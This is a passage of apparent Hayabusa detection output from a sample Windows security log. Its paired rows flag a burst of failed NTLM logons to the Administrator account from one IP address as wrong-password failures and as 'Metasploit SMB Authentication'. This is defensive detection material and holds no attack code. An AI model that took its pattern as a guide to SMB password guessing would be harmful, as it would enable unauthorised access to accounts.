Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0FPIXCc5FlKMLaL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c7Li2NqHgSIetZka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MuIRFiXBUqrJeMbx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zxJNU05FkPwhcYxj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TWifHaaBiypAGkKi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9VByeO8vHGSOJK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ns12T94itDDRxYxC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8jplFaHgwrWpFY8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ9L626fGZQkNC25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HfplQ16d7lsObzki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c30ILHx5sYZCMflg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GMsJKiYmbgbr9wF0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2hpQI6z68MVBzoW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDgzJjXBnWDSVjdg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0XU5HdsnM0Lvpvq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjmtkv6JDb4s2WnR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 